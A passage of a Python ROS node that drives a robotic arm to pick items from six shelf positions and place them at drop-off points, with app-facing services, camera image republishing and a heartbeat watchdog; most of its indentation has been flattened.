'L2':[-0.06, 0.22, 0.015],
'L3':[0, 0.22, 0.015]}
###############################################
# Pitch angle used for each shelf level
roll_dict = {'R1': -130,
'R2': -120,
'R3': -90,
'L1': -130,
'L2': -120,
'L3': -90}
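# Worker loop: takes shelf IDs from __target_data one at a time, picks the
# item from that shelf level, places it at the matching drop-off point,
# then returns the arm to its initial pose.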
def move():
while True:
if __isRunning:
if len(__target_data) != 0:
i = __target_data[0]
if __isRunning:
if shelf_position[i][0] > 0:
approach_x = -0.07
else:
approach_x = 0.07
grasps = Grasp()
                    # Grasp position
grasps.grasp_pos.position.x = shelf_position[i][0]
grasps.grasp_pos.position.y = shelf_position[i][1]
grasps.grasp_pos.position.z = shelf_position[i][2]
                    # Pitch angle when grasping
grasps.grasp_pos.rotation.r = roll_dict[i]
                    # Lift distance after grasping
grasps.up = 0
                    # Approach direction and distance when grasping
grasps.grasp_approach.x = approach_x
                    # Retreat direction and distance after grasping
grasps.grasp_retreat.x = approach_x
grasps.grasp_retreat.z = 0.02
                    # Gripper opening before and after grasping
grasps.grasp_posture = 450
grasps.pre_grasp_posture = 75
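                    # Short buzzer beep to signal the start of a pick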
buzzer_pub.publish(0.1)
result = pick(grasps)
if result:
if place_position[i][0] < 0:
yaw = int(120 - (90 + math.degrees(math.atan2(place_position[i][0], place_position[i][1]))))
else:
yaw = int(120 + (90 - math.degrees(math.atan2(place_position[i][0], place_position[i][1]))))
places = Grasp()
places.grasp_pos.position.x = place_position[i][0]
places.grasp_pos.position.y = place_position[i][1]
places.grasp_pos.position.z = place_position[i][2]
places.grasp_pos.rotation.r = -160
places.up = 0.045
places.grasp_approach.z = places.up
places.grasp_retreat.z = places.up
places.grasp_posture = 75
places.pre_grasp_posture = 450
place(places)
try:
__target_data.remove(i)
except BaseException as e:
print(e)
initMove()
else:
rospy.sleep(0.01)
else:
rospy.sleep(0.01)
th = threading.Thread(target=move)
th.daemon = True
th.start()
# Convert the ROS-published image into a format OpenCV can process,
# then republish the processed image
def image_callback(ros_image):
global lock
image = np.ndarray(shape=(ros_image.height, ros_image.width, 3), dtype=np.uint8,
                       buffer=ros_image.data)  # convert the raw image message buffer into an ndarray
cv2_img = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
frame = cv2_img.copy()
frame_result = frame
    rgb_image = cv2.cvtColor(frame_result, cv2.COLOR_BGR2RGB).tobytes()
ros_image.data = rgb_image
image_pub.publish(ros_image)
def enter_func(msg):
global lock
global image_sub
global __isRunning
global org_image_sub_ed
rospy.loginfo("enter out")
with lock:
init()
if not org_image_sub_ed:
org_image_sub_ed = True
image_sub = rospy.Subscriber('/usb_cam/image_raw', Image, image_callback)
return [True, 'enter']
heartbeat_timer = None
def exit_func(msg):
global lock
global image_sub
global __isRunning
global org_image_sub_ed
rospy.loginfo("exit out")
with lock:
__isRunning = False
try:
if org_image_sub_ed:
org_image_sub_ed = False
heartbeat_timer.cancel()
image_sub.unregister()
except:
pass
return [True, 'exit']
def start_running():
global lock
global __isRunning
rospy.loginfo("start running out")
with lock:
__isRunning = True
def stop_running():
global lock
global __isRunning
rospy.loginfo("stop running out")
with lock:
__isRunning = False
reset()
def set_running(msg):
if msg.data:
start_running()
else:
stop_running()
return [True, 'set_running']
def set_target(msg):
global lock
global __target_data
rospy.loginfo('%s', msg)
with lock:
__target_data = msg.position
return [True, 'set_target']
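# Watchdog: every heartbeat call with data=True re-arms a 5 s timer that
# would otherwise call /out/exit, so the app must ping at least every 5 s.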
def heartbeat_srv_cb(msg):
global heartbeat_timer
if isinstance(heartbeat_timer, Timer):
heartbeat_timer.cancel()
if msg.data:
heartbeat_timer = Timer(5, rospy.ServiceProxy('/out/exit', Trigger))
heartbeat_timer.start()
rsp = SetBoolResponse()
rsp.success = msg.data
return rsp
if __name__ == '__main__':
    # Initialize the node
rospy.init_node('out', log_level=rospy.DEBUG)
    # Servo command publisher
joints_pub = rospy.Publisher('/servo_controllers/port_id_1/multi_id_pos_dur', MultiRawIdPosDur, queue_size=1)
    # Image publisher
image_pub = rospy.Publisher('/out/image_result', Image, queue_size=1) # register result image publisher
    # Services for app communication
enter_srv = rospy.Service('/out/enter', Trigger, enter_func)
exit_srv = rospy.Service('/out/exit', Trigger, exit_func)
running_srv = rospy.Service('/out/set_running', SetBool, set_running)
set_target_srv = rospy.Service('/out/set_target', SetOutTarget, set_target)
heartbeat_srv = rospy.Service('/out/heartbeat', SetBool, heartbeat_srv_cb)
buzzer_pub = rospy.Publisher('/sensor/buzzer', Float32, queue_size=1)
debug = False
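    # With debug=True the node self-starts: it enters, queues all six shelf
    # slots, and begins running without waiting for the app.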
if debug:
rospy.sleep(0.2)
enter_func(1)
msg = SetOutTarget()
msg.position = ['R1', 'R2', 'R3', 'L1', 'L2', 'L3']
set_target(msg)
start_running()
try:
rospy.spin()
except KeyboardInterrupt:
rospy.loginfo("Shutting down")
cv2.destroyAllWindows()
|